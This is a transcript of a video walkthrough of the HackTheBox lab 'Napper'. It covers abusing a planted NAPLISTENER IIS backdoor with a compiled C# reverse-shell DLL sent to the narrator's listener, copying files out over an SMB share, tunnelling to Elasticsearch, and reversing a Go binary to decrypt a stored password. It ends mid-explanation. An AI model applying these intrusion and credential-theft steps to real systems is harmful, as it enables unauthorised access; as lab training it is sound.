What's going on YouTube? This is Ipsec. We're doing Napper from HackTheBox, which is a very unique but fun box. The whole theme of it is you're attacking a malware analyst development box. There's a bunch of blog posts that hint towards that of them reversing malware, one of which being NAPLISTENER, which is real-life malware discovered by Elastic. And it's actually deployed to his box because he's probably reversing it, right? So you have to look up NAPLISTENER, which is an IIS persistence that some APT had used. And if you give it a special parameter on a URL, it just executes .NET DLLs. So you get code execution on the box and then discover they're also moving away from laps and doing their own custom solution using some type of storage in Elastic. And you have to reverse a Go binary in order to discover how it works and then build something to extract the password out of laps and then decrypt it. And that gets you an administrator on the box. So with that being said, let's jump in. As always, we're going to start off with an nmap, so -sc for default scripts, SV, enumerate versions, OA, output all formats, put in the nmap directory and call it napper. And then I'm going to change things up a little bit. We're going to do -vv for double verbose. You'll see why in just a second. And then we wrap this command up with the IP address of 10.10.11.240. This can take some time to run, so I've already ran it. Looking at the results, we have a new column that we're not used to seeing. This one is the reason, and we have the type of response it was and the TTL. It's not really going to help us that much on this box. We see it's a SYN-ACK because that is how nmap determines if a port is open. And the TTL, if you watch previous videos, this is handy when dealing with like virtualization technology or firewalls or things like that. It's almost never going to be beneficial, but when it is, it's nice to know, right? So I always like having this TTL displayed. I just found out about this flag on nmap. It's something I would manually check before. Nice to see there's a way to just have it in the output. So with all that being said, let's just go look at the results. The first thing I notice is HTTP on port 80, and it's running a Microsoft IIS web server. And it's directing us over to app.napper.htb. So let's go ahead and add this to our host file. So sudo v etc host, and then we can add 10.10.11.240 appnapper.htb. And I also want to add, 10.10.11.240. There we go. And I also want to just add napper.htb, right? Okay. Let's keep going down the list. We have HTTPS on 443. The certificate name is appnapper.htb. That's no surprise to us. We can see the organization name is ML Ops Hub. I'm going to guess this is going to be the company name of who's ever maintaining this. We have the issuer. They also have a certificate authority, ca.napper.htb. So I'm going to go ahead and add that to my host file as well. And then let's see, is there anything else that's interesting? So this is the SSL certificate. We have the HTTP generator. So this is just a header in the HTTP request telling us the website was built on Hugo, which I think is a static website builder for Golang. We have HTTP title, the research blog, and the clock's used 14 seconds. The odd thing is this is a Windows box, but there's no 445 like SMB exposed. There's no LDAP. It's just web. So let's go take a look at the website. So I'm going to do HTTPS. Then we can go to napper.htb and we get a blog. So I'm also going to try, let's do app, a blog as well, HTTPS CA. Let's accept the risk here to see if there's anything here. It looks like everything is just going over to the same exact blog. So I'm going to start a GoBuster in the back to see if there's any other virtual host. So let's do GoBuster, then vhost. U is going to be the URL. We can say napper.htb. Then let's do word list, opt, seclist, discovery, DNS. And then we can say subdomains, top 1,000,000, 5,000.txt. Let's see how this finds things. I think it's working. So while that goes, let's go take a look at the blog. So this looks like it's just like a diary of a reverse engineer, right? We have reverse engineering SleeperBot. If we click on it, we can see it talking about what SleeperBot is. I'm not going to read all these blog posts because that would turn this into like an hour plus long video, but I highly recommend reading them all. It has some good information here. There's a step-by-step guide on enabling SSL on IIS. I'm guessing this is going to be how this IIS server was enabled, right? If we go to the next page, we have a post about enabling basic authentication IIS and a step on enabling it using PowerShell. And no subdomains actually got back. I wonder if we did something wrong, because one should have popped up. Like, I would have at least expected to see app, because that was one. We need to do HTTPS and probably add the -K flag to ignore SSL. And let's see if any pops up now. There we go. We have a internal.napper.htb discovered. So that is a new one we don't know. So let's go take a look at what internal.napper.htb is. And it's asking for authentication. That's what that 401 was, I think. Internal napper HTTP. We could try like guest to log in, but we need credentials. And on this one blog post, it's in how to enable basic authentication. If we read through it, there's one important step here, and it says how to add a user account. We have new local user, then the name is example, and then the password is going to be example password. So let's try logging in with that. So if we just do example and example password, we get logged into the, internal site of the blog. And there is another post called Internal Malware Research Notes. And if we click on this, it's talking about a malware sample found by Elastic called NAPLISTENER. And the backdoor is written in C.NET. And it's talking about the malware. It's designed to evade network-based detection in a sandbox. So any request to this URL, EWS message exchange health check D, contains base64 encoded assembly and the whatever parameter this is, SDA FWE3 RWE23, will be loaded and executed in memory. So this looks like it is an IIS backdoor that some APT used. Based upon it being EWS, I'm going to guess this is like using one of the proxy logon, I think it was for Exchange, or one of the Exchange vulnerabilities that came out, because this is probably Exchange Web Service is what EWS is. So the first step is trying to figure out if this server has this backdoor, right? So what I'm going to do is I'm just going to go napper.htb and let's try going to that URL, and we get a blank page. If I try going to EWS something else, I get a 404 not found. So this is looking like it may have that backdoor, right? Maybe the reverse engineer tried to install it on his web server so he can play with it and can't figure out how to get it working. If we go like to any other page, if I did like check instead of check D, again, 404. So this is definitely very, very peculiar, right? Let's try if we went to appnapper. Is it only on napper.htb? It looks like it's only exposed to napper.htb or maybe 10.10.11 to 40, right? And I'm guessing there's also something else we'll be able to see here because of how IIS is doing the routing. Let's just go examine all these headers. I'm not exactly sure if we'll see it. I think we may, though. Let's accept my burp suite error or certificate. Okay, so now I'm in repeater mode. We're going to do a git here. And we see the server IIS and then Microsoft HTTP API 2.0. Now I'm going to get rid of the D, so we just have it. And the server is IIS, right? So when we're here, we're in the IIS router before it actually gets to a web server, I believe. So that is another indicator something odd has happened here, right? If I just go, let's do a git request on appnapper HTTP, look at the server again, Microsoft IIS, right? So if I go here, it's still, we get a 404 IIS because we didn't hit that router that had the backdoor applied to it. So this is very sneaky. One of the small things you can notice is that, I guess. So if you had like logging on your web server and you wanted to see maybe you are infected and they used a different URL, like I would look at all the responses of server just to see if this header ever got sent, right? But let's go look at this backdoor some more. So if we go here, there's not much more information on the blog post, but if we go to Elastic's post, there's going to be quite a bit. So this is the blog post where Elastic found the threat actor using this. I'm not going to read everything. I recommend reading it. It's a good read, but everything we need kind of is right here in this picture. So this is just the, I guess, decompiled output of the backdoor. And I don't know exactly what this is called when we're like the backdoor is listening and it's specifying the URL. Maybe it's like port multiplexing. There's probably some fancy IIS term it's used. But essentially, this just lets us set up a very custom router on this URL. So when IIS hits this, it doesn't go to the virtual host it's expecting. It now goes to this application. So from here, it's just handling the response. And the key piece is down here, where it's if HTTP request form is has this SDA FWE3RWE23. If that is not null, so that parameter is set, then it's going to use .NET to load the assembly from base64 string. So it takes the base64 of this, loads it as a .NET assembly, and then does assembly.create instance. So this is going to be like a run DLL call. So we're going to call a specific function out of the DLL. We got to get the namespace. So that's going to be just namespace is something in .NET. And then we execute the .run function. And that's pretty much all the backdoor does. If we keep going down here, the blog post does explain that as well. Right here, I think they're talking about, the string HTTP API that I just talked about. If we go, let's see, somewhere here. Right here is what they're talking about, what I talked about, how if the submitted form contains that string, it would take the object and execute it using the run method. So let's build a .NET payload. I'm going to go to revshells.com and let's do 10.10.14.8 port 9001. I'm going to go down to the C# TCP client. I'm going to change the shell to, let's see, PowerShell, and then let's copy it. Okay. And then I'm just going to call this shell.cs. And casing is going to matter. I don't think the casing matters on the file name, but the like DLL name when we compile it and namespace and things do. I would just make sure the casing all matches. So I'm going to make the namespace shell. We can make this anything we want. It could be like rev shell. It could be pwn. The namespace doesn't matter because, again, when we look at the backdoor, the namespace is not what's hard-coded, right? We just have to make sure the namespace is consistent with what the assembly is, right? Because here's where it's getting the namespace. It's getting it. So if this was a lowercase s, and then when we compiled it, we gave it an uppercase s, then the namespace would not match. So, okay. And then we just need run. So I'm going to just rename these to run because that's what it calls. We don't need public static void. That's for if we're making it like an executable. I'm just going to do public run like this. And that is it, right? So now when we do a shell.run, it's going to go execute this. And then this is going to be our reverse shell. Okay. The next step is you want to do a sudo apt install mono dash, I think it's devel or dev. Yeah, mono dash devel is what you'll want to install. And then you do a MCS. And then we can say the target is going to be a library. We want it to be a DLL. And then dash out. This is going to be the file name. And again, this has to match what you have the namespace in the source code. And it's case sensitive. And then the file name, we called it shell.cs. And we see it did have a warning, but it's still compiled. So we have the DLL here. So let's do a base64-w0 and then xclip selection. I think it's dash selection clipboard. We need to do shell DLL. There we go. So now I have the base64 on my clipboard, right? So let's go and attempt to play with this backdoor. So right here, we see we're getting the HTTP API 2.0. That is fine, I think. 10, 10, 11, 240. Does that say the same thing? I'm just slightly paused real quick. Give me a second. I didn't think I was getting a 404 in my browser, but I guess this is a 404, just a blank page. It just doesn't have an error message. That's fine. Okay, I'm going to change it to a post. And then we need to go back to the blog post. It was like SWE or something. Where is it? Right here, SDA. Going to give it this parameter. And then let's recopy that, paste in the base64. And this has to be URL encoded. So I'll highlight it, press Control U. And then let's try the shell. So I'm going to do RL wrap. So I have my up and down arrows. NC LVMP 9001. We're going to send this. And we get the shell back. It's taking us a little time to run PowerShell. If we do whoami/all, let's see. We don't have any dangerous privileges here. I'm just glancing at those. Let's see. Our username, where is it? Username Sid. Okay, we are the Ruben user. And we can see the groups we're a member of. Nothing looked fancy, right? We're users, batch, console login. Yeah, I don't see anything too bad there. So I'm going to go into my home directory. And the one thing I noticed that's interesting is we do have a temp directory right in the root. This is non-default. We can see the create time was June 9th, 2023. The web server was installed 6/8/2023. So someone created this temp directory. I always place temp sensitive things in temp myself. So it's something we want to look at, right? But definitely want to look at Ruben. Let's do a dir on desktop. That is where the user.txt is. Let's do documents. See if there's anything here. It doesn't really look like it. Can we go into other users, maybe like internal? No. Backup? No. We could look at the public desktop if we wanted to, but nothing's there. I know we probably can't get into administrator. So nothing too interesting. Let's go over in the temp directory. And I normally would go in inetpub and look at like where configurations are for the database, but this has all been static websites. There's been no database or things like that. We could run netstat to see what ports are listening. But yeah, I guess that's a good thing to do. Let's do netstat-an. And let's see. Anything that sticks out. We have 80, 135, 445. So this is just going to be SMB. Let's see. So we know there's a firewall in place because this does have SMB listening, but it wasn't exposed to us. We also have 9200 and 9300, which is interesting. 80, 445. So 9200 is definitely interesting. But I'm going to keep going down the temp directory to see what's here. And we have app and internal. If I go in app, we can see this is the Hugo thing. If I do app content, we can see that's where the posts are. And these are all the posts that we had on the homepage. Let's just go in internal, internal content post. And we have some posts that we have not seen yet. We have no more laps. And then first RE research. Is that what we saw before on internal? What was the name of this? Napper HTTP. Name of this? Yes. The first RE research is talking about the NAPLISTENER, the backdoor we had exploited. So we know that post, but there is this no more laps post. So let's go in there. Let's do type no more laps.md. And we see the titles getting rid of laps, replacing it with our own custom solution. We're getting rid of laps in favor of our own custom solution. The password for the backup user, we saw that in C:\users, will be stored in the Elastic database. And Elastic's default port is going to be 9200, so that's probably what is listening there. IT will deploy the decryption client to the admin desktop once it's ready. We do expect development to be ready soon. The malware RA team will be the first test group. Since Ruben, I think, is a malware developer because, well, all his blog posts, I'm assuming the executable and configuration is going to be somewhere here. There is this internal laps alpha directory. So if we went in that, we can see there is a executable and a .env file. If we type on .env, we have the Elastic information. So let's now set up an SMB server so we can copy these files. So I'm going to make dir SMB. Let's go in here. Let's do sudo impacket SMB server, SMB2 support. I'm going to do -h because I always forget the order of the next parameter, the share name and then the path. So we'll call this share, and then the path, I'm just going to do pwd. So now we can do a new PS drive because we're in PowerShell, and I have to look up the syntax of this real quick. Let's see. I probably should just go to that link, but I clicked it too late. Example, so name, PS provider, root. Okay, so name, I'm going to call this exfil because we're not being stealthy. And then PS provider is what? File system? Yep. And then the last path was root, and that's going to be the address of my box, and then the share name. And we see it is connected. So I'm going to do a copy star to exfil. And this should copy things over to me. Let's just go in ls-smb. We see a.exe is in the process of being copied. Let's see, smb. And we also have this :zone identifier file. :zone identifier file. And this is probably just, what is it? An alternate data stream, ADS, was on it. If we cat this file, we can see some metadata around it. We see zone ID 3. I want to say maybe that comes from the internet. And we see a referral URL, all.zip, right? So let's look at zone ID 3 ADS. I think it's ADS for alternate data stream. Let's see. Yeah, zone 3 is the internet zone. So this is just Microsoft's way of tracking where a file came from. So it knows if it wants to display like Smart Screen or other things. That is an NTFS attribute. My file system here is not NTFS, so that's why it just treats the ADS stream as a file. But we can see that's where these files came from, is this all.zip. So I guess the first step would be, I'm trying to think, do we want to go straight into Ghidra or test out Elastic? I'm going to test out Elastic just because I like to postpone my reverse engineering as long as possible. So we should have a new prompt there. We do. We want to set up Chisel so we can access port 9200. So I'm going to do copy opt Chisel and then chisel.exe to here. And then I'm going to go in program data. I'm going to copy and then exfil : I think I do it like this. It looks like it's copying. Awesome. And let's set up a Chisel server. So I'm going to do cd opt Chisel. We can do /chisel server reverse socks 5, I think, because it's just socks. Let's do a -h socks. It is a socks 5. And then let's see, the other flag I want is -p for port. Put it on port 8000 because by default it listens on 8080, which is where Burp Suite is. So there we go. We're listening. I should be able to now execute chisel.exe here, put it in client mode, tell it I want to, what is the flag? I think 1010 14 8, 8000, and then capital R, then lowercase socks. Let's hope I get a ton open. There we go. So we have port 1080 is now listening. So now I can go to a curl -x for proxy socks 5. Yeah, socks 5 127.0.0.1 1080. And then we can say HTTP localhost, then 9200, right? Let's see what happens here. It's hanging. That is not a good sign. Is it just sucks? Let's see. Maybe HTTPS. And we need a -k. There we go. Awesome. So if we pipe that over to JQ, we can see we're missing authentication. I'm also going to add a -s and -q so we don't see this little transfer rate every time. So in order to do authentication, we want to add a -u flag, and that user was user, and then what is the password? And that's going to be dump password, and then $ here. I want to say that / is escaping. If we don't log in, then we know why, right? There we go. So now we're definitely logged in. So we're in Elastic. This is Elasticsearch, right? A lot of people that play with Elastic are more familiar with Kibana, which is the HTTP like GUI, but we're just in the raw Elastic right now. Let's do is it _cat indices? Let's see. Is it indices _cat? Incorrect. Let's see. I'm forgetting the syntax. Let's just Google it. Elastic cat indices C health. Curl. Cat indices API. This is what we want. Maybe I had a typo. There we go. So we can see, oh, I didn't have a typo. This is just not in JSON format, right? When I did it up here, this parse error is because this is not JSON and I had a JQ. Okay, so we see two indices, which are kind of like, I guess databases would be a good thing, or tables. There's a seed and a user. So we could get the documents out of seed. So if we did a we specify the indice or table, I guess, and then we can say _search. And this is just going to search that and get us all the documents, right? And there's only one document, and that is called seed, and we have this number. We don't know exactly what this is. We could also get documents out of here. I think if we did a _get and then specify the document ID, which this one is 1. Let's see. Is it just seed and then no underscore? What is it? Seed. I think ID. Let's see. Elastic API get document. Let's see. What is it? _doc. Right? So we can also get the document that way if we know the ID. There was a second one, user. So let's just do the same thing with user and then search. So that's user 4 zeros 1. JQ dot. And let's see, no such index because I'm missing a 0, I think. There we go. And we again have one document, and this one is called Blob. So that's the information out of Elastic, at least that this user has access to. So it doesn't really help us much. But I wanted to show like playing with the Elastic API manually because we're going to do it programmatically now, I guess. So let's open up Ghidra. Let's do Ghidra run. And we'll open up a .exe. So let's do new project. I don't save these, so it doesn't really matter there. Go over to the dragon. And then once this loads, I'm going to hit I so I can import the executable right here. And then we'll just let it go. It's going to take a little while to process this. And if you did like Ghidra on a Golang binary before, you probably hated life, but it's gotten a lot better since then. So we probably won't even need to like use any third-party plugins to understand what is going on here. But I'm going to pause the video. It's probably going to take like 5 minutes until this blue bar stops moving. And then once it does, we know the analysis is done and we can begin looking at it. Okay, everything is done. So the key thing is going to namespaces when you open up these binaries. And then I'm going to look for the main because that's where Golang program start is in main. And we can see all the functions here. We mainly have encrypt, gen key, main.main. So this is the entry point. And then we have, that's pretty much it. So let's look at this. We don't have to go too much in the assembly output because the decompile does surprisingly well. We can see like the imports here. So it's getting the Go Elastic client. Then we have HTTP transport TLS, more Elastic, defining some variables main.seed. But I'm just going to go down past this whole import table to see what it does. So right off the bat, the first thing it does is use this go.env program. And this is the most popular way, I think, in Golang to just load your environment from a .env file. Almost every application uses it. So it's reading the .env file here and then loading it to just populate the environment. And now we have it setting the URI, the user, and the password, right? So we have this, and then we get the environment. So it's putting this on the stack and saying, hey, go get the environment for the Elastic URI. And if we looked at the .env file, we see that is HTTPS localhost 9200. So same thing with user and pass. So right here, we're just connecting to Elastic. Let's see, scrolling down. This is all going to be the config that it uses to connect. So it's talking about like the API keys, the header, how it handles TLS, things like that. So we can kind of ignore that. And then right here is going to be the first function. So this whole pgvar3, this is the Elasta client, I guess. It's calling the API get function. And then every now and then Ghidra doesn't do strings well because most strings in programs are null terminated. The thing about Golang is it's all like fixed length. So whenever you have a string before it or after it, I forget which, you have the length of it, right? There's no null byte that terminates the string, and that's why things have trouble. So right here, we see the get, and then it's going with this 0x9 whatever. So if we go to this spot in memory, so I'm just going to go over to the assembly view or disassembler, hit G, and then enter the address. We see that goes to this char 4, which is seed, right? It's a length of 4 string that is called seed. So all this is doing is making a request to get seed. Let's do a comment real quick. Let's see, is this where we did our curls? It is. So this was what? Seed doc1, right? So this is what that's doing. I'm just going to put that in the comment. That work? There we go. So that's all it does there. And now we're checking. It has an error, or it checks if there's an error, I guess. We can keep going down. We don't know exactly what it does with the seed. I'm trying to see if I can easily spot like the variable it saves the seed. I don't know off the top of my head. So let's just keep going down and see what this application does. Right here, we have an error getting a response. So I'm guessing we're doing something. Let's see. I think we're still dealing with the seed. We have a JSON on Marshall, right? And that makes sense because this is all JSON. So right now it is looking for that. Let's see. We're doing a gen key on seed. And then we're doing API indices create, and then this string. So let's look at exactly what 0x whatever this is. So go in this spot in memory, and this is user 001. So let's just put this here, 4 O's, I think. So that's what that is. And it looks like, I'm guessing it's going to create that blob that we saw before, right? Because when we did the search, let's do search. It has this. I'm guessing since this says create, this is what is creating this. And I think that because right beforehand, it does gen key and encrypt. So we want to see exactly how it generates the key and then how it's doing encryption. So let's look at the gen key. And I guess we don't have to take notes yet, I guess. We'll do it at the end and walk through. So looking at the gen key function, we specify the seed, and we know the seed came from Elastic. So what we're doing here is creating a 16-byte key, 0x10, that's 16 in hex, and then just doing mathran to increment by 1 and create the key. We have ivar1 plus 1 right here. So we'll just have to recreate this. Because the seed, we know the seed, and it's not a random seed, even though this is doing a random number per byte, we can recalculate that again because that's what the seed is. If you think of the random as not random, it's just a giant table, and the seed is where you insert yourself at that table, right? So since we can just insert ourselves at the table, then random is no longer random, and we can generate the key based upon the seed. So we can beat this function. We now just need to know how to encrypt. So looking at it, it is going to be AES. And then let's see, is there anything else we need to know? It is a CFB cipher. So what we have, let's make notes real quick. So the first thing is we can get the seed from Elastic. This is, was it seed doc1 or something, right? And then the second step is going to be, we want to be able to generate the key, or let's get the blob first. Get the blob from Elastic. And we want to do user 0001 and then search. The third step will be generate the key from seed. And then we want to decrypt blob with key. And this is going to be 16 byte. Maybe it's bit. I think it's byte. Decrypt the blob with the key. And this is AES-CFB. And then we don't know what that is. I think the blog post said it was the backup user. But if we keep going down on main, we'll see exactly what it does with this, right? So let's keep going through or reversing. Let's see. I don't know where we are. Error getting response. Indices create. So this is where we created the key. And now we're creating the struct. This probably doesn't make sense right now, but it will once we do the coding. So I'm just stepping over that. Let's see, API index. What are we getting here? This is probably seed, right? No, that's user. Okay. So I don't know what this is doing. But down here, we see it calling cmd.exe. And it's putting each of these on the stack. And if we looked at what these are, this is, again, just spots in memory. Let's see. I guess we can go start off with this. We should be able to make this a string, right? Or something. Let's see. Copy 0x. So that is \c. Can we rename? I don't like doing it that way. Let's see. Edit function signature. there's got to be a way to change this. This is how you could look at it. I'll show you in a second how I did it, because I used a plugin. 0x 009715542. This is user. And then if we look at this one, let's go 0x. This is backup. So this is /c net user backup, right? I want to Control Z to undo that. So what I'm going to do is, if we look at it, let's go to my script manager. I'm going to search Go. Let's see. I don't think it's Go dynamic strings. Which one is this? I want to say that will crash. Let's see. Google, Ghidra, Golang, plugin, NCC group. Not cartographer. It was like Go strings. This is it. So let's see. They give us the workflow that we should be doing. I want to say it's string filler is what I want. We're not going to do the full workflow. We're just going to run this because it's quicker. And one of those definitely does break my Ghidra. So we can see here now after I ran that one script, net user backup is there, right? If you want to import that script, you go, let's see, where is Ghidra here? You download the zip, go to install extensions, and then do the plus and navigate to where the extension is installed. So that's how you install it to get the script manager where you can do this. And that just automatically cleans up strings and makes it easier. I don't know why it didn't do this one, which was /c is what this was. So it's not perfect. If you followed all the steps here, it may be, but I think this for some reason just does not like my environment. So I don't want to run through them all and crash my X Windows system and have to like restart this, right? But we can see this is now just setting the net user backup password to what this decrypted blob is. So we have to make a Golang program to emulate what this is doing. We could cheat and kind of just use a bunch of curl and then paste and just do Golang for the encryption, but let's do Golang for the entire thing. And the other thing is why I'm doing this in Golang. Why not just code it in Python? Whenever you deal with cryptography, it's always smart to be as close to the target as possible, because I bet if I did it in Python, the seed would still like render different results and it wouldn't work. I haven't tried it yet, but I've never really had luck with, using a different language and then doing this type of attack. So I'm going to create a directory napper, I guess. Call it whatever you want. I'm going to call it no more laps because that's what they called it. Okay, and then we can do go mod init no more laps to create the module, and then we can just do a touch main.go, and let's open up Visual Studio Code to start this off. Okay, and let's see. We want to do package main, and then, what is it? Func main. Where's my copilot? fnd print line, hello world. Let's just make sure this all works. Why do I have this in 2? Go run dot. There we go. So now we have this. Let us connect to Elastic. And I'm going to use the same library they did. So I'm going to go back to Ghidra. We're going to go up to github.com and grab the Go Elastic client. And we can say go get, and then paste this. So this is going to add this into our, I guess, modules. So we can use this Elastic library. So now let's create a new function. And I think this is just good practice. Instead of doing it all in main, we're going to say new Elasta client. And then we want to give it a config. So this will be elasticsearch.config. I did 2 R's there. There we go. So it automatically added this because we're pulling this out of this. I think I did that right. Elasticsearch. I don't know why that's underscored, but we'll see. We want to return the client. And looks like Copilot is doing a lot for me. Let's see. Client error. What are you erroring at? Undeclared name, Elasticsearch. Let's see. Oh, we need a /v8. Right? Is that it? There we go. Awesome. And the whole reason why I think like this is good practice is just like Golang's all about error handling. And I hate having too many like things just in main. That's not a good explanation, but we'll go with it. So let's create a config. So we do config elasticsearch.config. And then what we need. So it says addresses. We can specify our address. And I'm not going to do localhost 9200. We're going to do napper 9200. We can do this first. We'll show why I don't want to do this. It's actually pretty interesting, I guess. So we do the address. Next, we probably need the username. And this is going to be user, or is it backup? I think it's user. And the password was, that's cat.env, smb.env. Here's the password. It doesn't have that \. Okay. And then normally we need a transport, right? Let's see. Yep, transport, and that's an HTTP object. So transport. Let's see. The only thing I'm doing here is I want to set the proxy. So I want to make this proxy aware. So we say get the proxy from the environment. And then we're going to specify the TLS client config. And we do, is insecure skip verify? Yeah, that's it. That is going to ignore certificate checking, right? Because this is a self-signed certificate. We don't want to validate, right? That's what like the -k and curl does. So that is all set. So let's create the new client. So we'll do C new Elastic client CFG. And let's see, I guess we can print C and see what happens. So we have this. Okay. So if I do go run dot, it's going to hang because it's trying to, don't know what it just did. Let's see, I don't know what that false is. Let's do a +v. Let's see, client. Did it actually talk? Compatibility header. No, it's not. There's no way, because Proxy's on intercept, isn't it? Yeah, it is. Oh, we didn't do HTTPS proxy. Let's do SOCKS 5, 127.0.0.1. No, we want HTTP 127.0.0.1, 8080. Once we intercept the request, we're going to have to tell Burp to use the SOCKS proxy we have set up, which is through Chisel. But we can see it's not going through. And that's because there's a ignore on localhost. So even though we're specifying the proxy and saying to make it proxy aware with this, it's ignoring it because it's localhost. So let's do sudo v etc host. And I'm going to make 127.0.0.1, and then we'll call it napper. And then in our code, let's change the URL to be napper. And now that it doesn't see localhost or 127.0.0.1, it's not going to ignore the proxy setting. Super annoying. Or it just did. Is it underscore or lowercase? I don't know. I wonder if this environment variable is not getting in with the go run. It's the only thing I can think of. Let's create a, let's use the go.env. So go back here. Let's see, Elasticsearch. What is go.env? Go.env, GitHub. Grab this. Go git. Okay. Let's do air go.env load. If air is nil. I'm not doing any proper logging. Let's just panic air. There we go. v.env https proxy 127.0.0.1 Okay. I wonder if it's just because we're creating the client and not making a request yet. I thought this would force it like to log in and test the connection, but maybe I'm wrong. Let's do 127.0.0.1, 9200 again. We can remove that. NCLVMP 9200. Okay. So it's not even attempting to make the connection yet. Okay, that's fine. So let's get the seed. Let's create a new function. And I'm going to call this, what do I want? We'll do get seed. And what do we return? I think it's an integer. And we want to give it the Elastic client. So let's see. We'll do C, then Elastic search dot client. So we can say the result error is equal to C dot get. And then I think Copilot is screwing up. I think this is just seed and then 1. If error is equal to nil, panic. And then let's just print what res is. So let's do get seed C. Go run. It wants us to return. Let's just make this a string for now. And let's do string error. We can return nothing, the error. And then let's see, we want to return string res body nil. Why is that erroring? I guess we need to read it, I'm guessing. Let's see. Let us do that. So what the whole defer does, it means when we exit this function, then it's going to run this. So it's going to close the body when we exit the function. Let's do body bytes. Error, IO, read all, res body. Okay. And now should be able to return this. Awesome. And then we can say seed error. Now run. Hello world, and it's now making a request in Burp Suite. And we can see it's going to seed doc1. And if we wanted to see what this response was, we can't because we didn't configure the proxy yet. So let's go to proxy settings, go into socks, use socks proxy, proxy host 127.0.0.1, port 1080, click use socks proxy, send, and this is what we get. So if I just forward this, we get that. So I want to check something real quick. Let's do 127.0.0.1, 9200, and I want to see if it still goes through the proxy. It did not, right? See, we see dial refused. So again, there's a blocker on it talking to it. So whenever you try to make something proxy aware, just don't use 127 or localhost and Golang. There's some PRs to fix things, but it's been a while. There's probably a better way to do it, but that's just my lessons learned, I guess. So let's see, we get the seed and the response was this. And Golang is a pain to just unmarshal like JSON that you don't expect. You can do a bunch of like map string interface to do a lot of weirdness, but I'm not going to cover that. I'm going to do it the way I like doing it. Like when you're used to like being able to just convert JSON to an object, like Python handles it very well, but Golang does not. You need to at least like give it a hint at what you want. We don't need this whole struct. We can just do a partial. So let's see, I'm going to do it right next to the seed function. This probably should go in like models.go to be organized, but we're just going to do it here. So we'll say it's a get doc response struct, get doc response. I'm going to call it seed. There we go. That's a long name. I probably should just call it like seed struct or seed response. Seed response. Okay. So here we want to define what we want. So we'll call this, we'll make it easy. The first field we want is source. So I'm going to say source, and this name doesn't matter because what we put here is we define it's in JSON underscore source. So what this is doing, it's taking this, it's assuming this, what we give it is JSON. It's looking for the underscore source, and then it's going to label that as a source with a capital for us. And then the next thing we want is the seed. So I'm going to call it seed. And after seed, we say it's an integer. And I think it's JSON seed. It is. Awesome. So now we have the seed response. So right here, now we can say var seed response. So we define the variable. And then we can go error. That's not it. Let's do, is it JSON unmarshal? And then body bytes to seed. So we're taking the body bytes and unmarshaling it to this struct. And then if error nil, return, okay. So that means we were able to unmarshal it. And now we can say, let's do if length, and we'll say seed source seed is greater than 0, or we'll say equals 0. Or, oh, that's an integer. There we go. We'll return error and say seed not found. Okay. Why is that highlighting? Error string should not be capitalized. There. And now finally we can return seed source seed. And this is now an int. And now we have to change these to be -1. You can put anything you want here. You could do zeros. My habit is returning -1 when there's an error. So now we have the seed. So let's see if this works. Let's just do a go run dot hello world, and we get the seed. Awesome. We can do fmt printf, and then we'll say seed %d and \n, right? Awesome. This hello world. We can just say connecting to Elastic. So now the next step was we wanted to get the blob. So the blob was a little bit different, right? When we were doing the get seed, we're using the get document command, and that only worked because the index of that document, or the document ID, was 1. But when you do the search, it's a different syntax, right? It was user 401s. If we do _doc1, it's not found. This was _search. And this, right? So we're going to have a bit more complex of JSON, and the function's going to be a little bit different. So let's go back here and create this. So we called the get seed. Let's do func. We'll do get blob. And then C Elasticsearch dot client. And this we want to, what do I want to return? We'll do a string and error. Okay, so let's say the result error is equal to C, and we're going to search this time. And then we just want to search on the index blob. We could put like a timeout and do a context probably. Is there like a C context? There's probably a way to do a context, but let's not overcomplicate it. Let's just do search. If error is nil, return nothing. Defer, so we close the body. Let's read the response. And then we can return. Let's just make sure this works. So let's do blob error, get blob, C. Go run. Let's see. Security issue, because I think I'd put the wrong, yeah. With index, this is user 4 zeros and 1. There we go. So this is the blob we want. Because this is more complex, how we go hits, we have to spend more time creating this struct. And we're going to do it 2 ways. I'm going to show you, I guess, the lazy way and then the way I would do it. So I'm just going to call this blob response struct. And if we wanted to do it the way we did with the seed, we have to do quite a bit of nesting, right? Because we want to grab where it says hits. So let's do hits struct. And this will be JSON hits, right? Yep. And then the next layer is going to be hits, right? So we went hits. This is a array. So we say a list struct like that. And this will be, again, JSON hits. Then the next is source. So source struct. And then I think it's Blob, right? Yes. So this is, I think, valid. Let's try unmarshalling and getting it. So we can say var blob response JSON on Marshall. Yes. Okay. If we have hits, we'll say not found. That looks fine. And then let's see, what do we want to return? It's blob hits 0 source blob. Go run. Didn't get it. Let's see. Let's go to Proxy, history. We should have got it. Let's see. Let's do a V on blob hits. Don't know what I messed up here. Hit source blob. So it doesn't look like I have any data in this. I don't. So that leads me to believe my structure is wrong. So we say hits. So we go hits. Oh, we didn't specify JSON here. JSON source. There we go. Because then we go in the source and then we want that. That looks better. There we go. So we have the blob. Let's get rid of this print statement. Right. So if we wanted to, if we didn't want to go do all this nesting, we could break this up into multiple structs. So we could have one struct. Let's do a search response. And then I'm just going to call response struct. And then this is going to be JSON response like that. And then I'm going to create another one called search result struct. And then we'll say result struct. And this will be JSON source like that. And this is blob string. So what I did is this search result is really just this piece, right? I'm just kind of renaming it a little bit. And then here we can just say results is equal to an array of search result. And then this will be JSON hits. I think that's right. This is not JSON response. This is also JSON hits. So these two are pretty much the same thing. I've named them slightly different because I like this name better than hits and hits. If we wanted to, we can prove that. So let's do blob. Let's do search response. And now this is now no longer hits. This will be blob dot response results is 0. And then blob response results result blob, right? These are the same things. I just think this is easier to read. It may be a little bit more confusing when you think about it as an Elastic document or Elasticsearch query, because Elasticsearch query likes the word hit and hits, but to each their own, right? I just wanted to show both ways. Not one way is better than the other, but hopefully that doesn't confuse you and does help you. Let's see. So now we got the blob. So what we want to do is generate the key, right? So let's do a function. And I'm going to call this gen key. And then the seed is integer. And then we want to, I guess, return a byte. Is this what we want? Let's see. Return key. So we made it 16 bytes. And if we went back to, let's see, where is namespace? Where did that go? Small main gen key. Right? Yeah, 16. And then let's see. So we make that. Oh, we need to set the seed. Rand seed is, I guess we need it to be int64. And now it just imported the random module. So then we make the key. We're going to loop 16 times. And now we want to assign the key. And it used byte, then rand int n 254 plus 1. Let's see. Yep, that is right. This FE, that's 254. We can see that there. And then here it does that plus 1. So we have now mimicked that generate key function. So we can say here, key, gen key, and 64 seed. Don't know if we want to print the key. Probably, what the heck? What happens if we print it? Is it even ASCII? It is not. So let's not worry about printing it. So the next step is going to be decrypting. So let's do a function decrypt, and we're going to give key and blob. And we want to return a string or error. Okay. So let's do is it blob? No, we want, yeah, we'll call this B64 blob. Or I'm thinking blob is really ciphertext. That would be the correct way to call it, but oh well. 